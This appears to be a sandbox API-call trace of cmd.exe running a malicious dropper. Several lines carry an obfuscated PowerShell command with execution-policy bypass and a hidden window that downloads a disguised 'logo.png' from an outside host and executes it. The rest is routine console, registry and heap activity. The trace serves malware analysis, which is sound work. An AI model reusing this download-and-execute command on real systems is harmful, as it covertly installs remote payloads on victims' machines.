	[0121.100] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0121.100] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0121.100] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0121.100] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfc28 | out: phkResult=0x2cfc28*=0x0) returned 0x2
	[0121.100] VirtualQuery (in: lpAddress=0x2cfc10, lpBuffer=0x2cfb90, dwLength=0x30 | out: lpBuffer=0x2cfb90*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.100] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfb90, dwLength=0x30 | out: lpBuffer=0x2cfb90*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.100] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfb90, dwLength=0x30 | out: lpBuffer=0x2cfb90*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.100] VirtualQuery (in: lpAddress=0x1d4000, lpBuffer=0x2cfb90, dwLength=0x30 | out: lpBuffer=0x2cfb90*(BaseAddress=0x1d4000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.100] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfb90, dwLength=0x30 | out: lpBuffer=0x2cfb90*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.100] GetConsoleOutputCP () returned 0x1b5
	[0121.101] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.101] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0121.101] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0121.101] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.101] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0121.101] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0121.102] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.102] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0121.102] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.102] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0121.102] GetEnvironmentStringsW () returned 0xe8f20*
	[0121.102] GetProcessHeap () returned 0xd0000
	[0121.102] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xad4) returned 0xe9a00
	[0121.102] FreeEnvironmentStringsW (penv=0xe8f20) returned 1
	[0121.102] GetProcessHeap () returned 0xd0000
	[0121.102] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x8) returned 0xe87a0
	[0121.102] GetEnvironmentStringsW () returned 0xe8f20*
	[0121.102] GetProcessHeap () returned 0xd0000
	[0121.102] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xad4) returned 0xea4e0
	[0121.102] FreeEnvironmentStringsW (penv=0xe8f20) returned 1
	[0121.102] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceae8 | out: phkResult=0x2ceae8*=0x44) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x18, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x1, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x1, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x0, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x40, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x40, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x40, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegCloseKey (hKey=0x44) returned 0x0
	[0121.103] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceae8 | out: phkResult=0x2ceae8*=0x44) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x40, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x1, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x1, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x0, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x9, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x4, lpData=0x2ceb00*=0x9, lpcbData=0x2ceae4*=0x4) returned 0x0
	[0121.103] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceae0, lpData=0x2ceb00, lpcbData=0x2ceae4*=0x1000 | out: lpType=0x2ceae0*=0x0, lpData=0x2ceb00*=0x9, lpcbData=0x2ceae4*=0x1000) returned 0x2
	[0121.103] RegCloseKey (hKey=0x44) returned 0x0
	[0121.103] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e87
	[0121.103] srand (_Seed=0x5d3b2e87) 
	[0121.103] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.103] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.104] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.104] GetProcessHeap () returned 0xd0000
	[0121.104] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x218) returned 0xe8f20
	[0121.104] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0121.104] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0121.104] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0121.104] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0121.104] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0121.104] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0121.104] GetProcessHeap () returned 0xd0000
	[0121.104] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xe9a00 | out: hHeap=0xd0000) returned 1
	[0121.104] GetEnvironmentStringsW () returned 0xe9140*
	[0121.104] GetProcessHeap () returned 0xd0000
	[0121.104] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xaec) returned 0xebad0
	[0121.105] FreeEnvironmentStringsW (penv=0xe9140) returned 1
	[0121.105] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0121.105] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.105] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0121.105] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0121.105] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0121.105] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0121.105] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0121.105] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0121.105] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0121.105] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0121.105] GetProcessHeap () returned 0xd0000
	[0121.105] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x48) returned 0xe8d80
	[0121.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf8f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.105] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x2cf8f0, lpFilePart=0x2cf8d0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x2cf8d0*="Documents") returned 0x1b
	[0121.105] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.105] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf600 | out: lpFindFileData=0x2cf600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0xec5d0
	[0121.105] FindClose (in: hFindFile=0xec5d0 | out: hFindFile=0xec5d0) returned 1
	[0121.105] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x2cf600 | out: lpFindFileData=0x2cf600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0xec5d0
	[0121.105] FindClose (in: hFindFile=0xec5d0 | out: hFindFile=0xec5d0) returned 1
	[0121.106] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x2cf600 | out: lpFindFileData=0x2cf600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0xec5d0
	[0121.106] FindClose (in: hFindFile=0xec5d0 | out: hFindFile=0xec5d0) returned 1
	[0121.106] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0121.106] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.106] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0121.106] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0121.106] GetProcessHeap () returned 0xd0000
	[0121.106] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xebad0 | out: hHeap=0xd0000) returned 1
	[0121.106] GetEnvironmentStringsW () returned 0xeafd0*
	[0121.106] GetProcessHeap () returned 0xd0000
	[0121.106] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xb2c) returned 0xebb10
	[0121.106] FreeEnvironmentStringsW (penv=0xeafd0) returned 1
	[0121.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.106] GetProcessHeap () returned 0xd0000
	[0121.106] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xe8d80 | out: hHeap=0xd0000) returned 1
	[0121.106] GetProcessHeap () returned 0xd0000
	[0121.106] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x4016) returned 0xec650
	[0121.107] GetProcessHeap () returned 0xd0000
	[0121.107] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x260) returned 0xe9c80
	[0121.107] GetProcessHeap () returned 0xd0000
	[0121.107] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xec650 | out: hHeap=0xd0000) returned 1
	[0121.107] GetConsoleOutputCP () returned 0x1b5
	[0121.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.107] GetUserDefaultLCID () returned 0x409
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfa00, cchData=128 | out: lpLCData="0") returned 2
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfa00, cchData=128 | out: lpLCData="0") returned 2
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfa00, cchData=128 | out: lpLCData="1") returned 2
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0121.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0121.108] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0121.108] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0121.108] GetProcessHeap () returned 0xd0000
	[0121.108] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x0, Size=0x20c) returned 0xe9f60
	[0121.108] GetConsoleTitleW (in: lpConsoleTitle=0xe9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0121.109] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0121.109] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0121.109] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0121.109] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0121.109] GetProcessHeap () returned 0xd0000
	[0121.109] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x4012) returned 0xec650
	[0121.109] GetProcessHeap () returned 0xd0000
	[0121.109] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x4010) returned 0xf0670
	[0121.109] GetProcessHeap () returned 0xd0000
	[0121.109] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x1a) returned 0xe49a0
	[0121.110] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xe49a0 | out: hHeap=0xd0000) returned 1
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xf0670 | out: hHeap=0xd0000) returned 1
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x4010) returned 0xf0670
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x1a) returned 0xe49a0
	[0121.110] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xe49a0 | out: hHeap=0xd0000) returned 1
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xf0670 | out: hHeap=0xd0000) returned 1
	[0121.110] GetProcessHeap () returned 0xd0000
	[0121.110] HeapFree (in: hHeap=0xd0000, dwFlags=0x0, lpMem=0xec650 | out: hHeap=0xd0000) returned 1
	[0121.111] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0121.111] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.111] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.111] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.111] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.111] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.111] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.111] GetProcessHeap () returned 0xd0000
	[0121.111] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xb0) returned 0xea180
	[0121.111] GetProcessHeap () returned 0xd0000
	[0121.111] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x30) returned 0xe69a0
	[0121.111] GetProcessHeap () returned 0xd0000
	[0121.111] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x14) returned 0xe8d80
	[0121.112] GetProcessHeap () returned 0xd0000
	[0121.112] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xb0) returned 0xea240
	[0121.112] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0121.112] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0121.112] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0121.112] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0121.112] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0121.112] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0121.112] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0121.112] GetProcessHeap () returned 0xd0000
	[0121.112] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0xb0) returned 0xea300
	[0121.112] GetProcessHeap () returned 0xd0000
	[0121.113] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x2e) returned 0xe69e0
	[0121.456] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.456] GetProcessHeap () returned 0xd0000
	[0121.456] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x170) returned 0xd1a20
	[0121.456] GetProcessHeap () returned 0xd0000
	[0121.456] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x2d0) returned 0xeb050
	[0121.466] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.466] GetFileType (hFile=0xb) returned 0x2
	[0121.466] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0121.466] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2cf2a8 | out: lpMode=0x2cf2a8) returned 1
	[0121.467] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.467] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cf2e0 | out: lpConsoleScreenBufferInfo=0x2cf2e0) returned 1
	[0121.467] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0121.468] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.468] GetProcessHeap () returned 0xd0000
	[0121.468] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x170) returned 0xd1c30
	[0121.468] GetProcessHeap () returned 0xd0000
	[0121.469] RtlAllocateHeap (HeapHandle=0xd0000, Flags=0x8, Size=0x2d0) returned 0xeb6b0
	[0121.471] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x2cf0d0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf080 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x2cf080*(hProcess=0x54, hThread=0x50, dwProcessId=0xc5c, dwThreadId=0xc60)) returned 1
	[0121.474] CloseHandle (hObject=0x50) returned 1
	[0121.474] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
